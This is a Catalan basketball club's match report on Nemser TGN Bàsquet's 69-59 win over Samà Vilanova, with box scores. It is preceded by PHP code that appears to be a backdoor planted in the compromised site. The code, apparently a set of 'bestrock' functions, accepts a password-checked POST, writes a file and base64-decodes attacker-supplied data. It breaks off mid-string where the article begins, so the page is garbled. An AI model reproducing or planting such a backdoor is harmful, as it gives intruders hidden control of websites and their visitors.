function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet guanya un dels grans equips de la lliga, el Samà (69-59) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet guanya un dels grans equips de la lliga, el Samà (69-59)

By
Updated: febrer 7, 2015

Una victòria de prestigi i de futur. Així es pot definir el matx que el Nemser TGN Bàsquet va jugar i va vèncer contra el tercer classificat del seu grup, el Samà Vilanova, un conjunt que fins arribar al pavelló del Sagrat Cor només havia perdut tres enfrontaments. L’equip que dirigeix Jordi Hernández va fer un matx molt complet i, per primera vegada en molt de temps, va tenir l’encert ofensiu que el tècnic demanava després de treballar molt bé els atacs. Perquè la diferència cal trobar-la aquí. Durant tot el curs, el Nemser TGN Bàsquet ha estat un conjunt que s’ha caracteritzat per una intensitat en el seu joc impressionant, amb un ritme frenètic durant els quaranta minuts tant en defensa com en atac. Malgrat tot, a l’equip lila sempre li ha faltat una cosa: encert. En situacions d’atac estàtic (posicional), el Nemser TGN Bàsquet sempre ha fet una gran circulació de pilota, però els tirs còmodes i sense defensor a mitja i llarga distància, no entraven. Contra el Samà, sí. El matx va ser un premi a la feina ben feta per a un conjunt que, si creu en les seves pròpies possibilitats, pot anar molt lluny en la segona volta.

El matx va començar molt bé per les locals. Amb un sortida espectacular, el Nemser va desfer la defensa contrària i va arribar al final del primer període amb un clar avantatge (24-9). Les coses pintaven molt bé i amb un parell de bones accions ofensives, el marcador mostrava un 28-11 esperançador. Però tot es va començar a complicar. El Samà no va perdre els nervis i anava fent la feina de la formigueta mentre les locals no aprofitaven els tirs a quatre i cinc metres. La manca de punteria va provocar que s’arribés al descans amb un 31-24. En el tercer període, el matx va estar molt igualat. El TGN Bàsquet continuava per endavant, però les diferències eren cada vegada més petites (45-41 a 1:46 del final del període).

L’últim quart va ser decisiu. Les locals van fer un joc brillant, ple d’encert que els havia fet falta en els dos períodes precedents i van poder culminar el triomf. L’expulsió d’Ester Farré -vital en el rebot i a l’hora d’intimidar durant tot el matx- per cinc faltes després de cometre una falta en atac i ser castigada amb una tècnica per protestar, semblava que posaria en perill el triomf (56-45 a 6:07 del final). Va arribar l’hora d’Ona Fort. La que va ser millor jugadora de l’equip lila durant el curs passat, va trobar el camí del seu millor moment de forma amb una actuació magnífica i decisiva en què es va carregar l’equip a l’esquena. Fort va fer de tot: anotar en atac des de totes les posicions, forçar faltes i agafar rebots en les dues cistelles. D’ella, més que ningú, va ser el triomf. Amb tot, seria injust no esmentar una altra vegada el gran joc coral del Nemser TGN Bàsquet que feia molt de temps que buscava un partit com aquest per refermar les seves opcions de ser un equip gran a la lliga.

 

NEMSER TGN BÀSQUET     69

SAMÀ VILANOVA    59

NEMSER TGN BÀSQUET:  G. Fort (2), O. Fort (21), Vilamajor (14),  Martínez i Farré (12) -cinc inicial- Piñol, (2), García (5), Cabré (2), Villegas (9), Martí (2) i Gómez. 4/20 triples: Vilamajor i Villegas (2). 11/19 tirs lliures. 17 faltes. Eliminada: Farré (34′).

SAMÀ VILANOVA:  Palacios, Isern (14), Pascual (19), Megías, Torres (6) -cinc inicial- Luque (7), Rodríguez (9), Liñán (4), Tena. 5 triples: Pascual i Torres (2), Luque. 16/21 tirs lliures. 18 faltes.

PARCIALS: 24-9, 7-15, 17-17 i 21-8.

ÀRBITRES: Roset i De Antonio.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *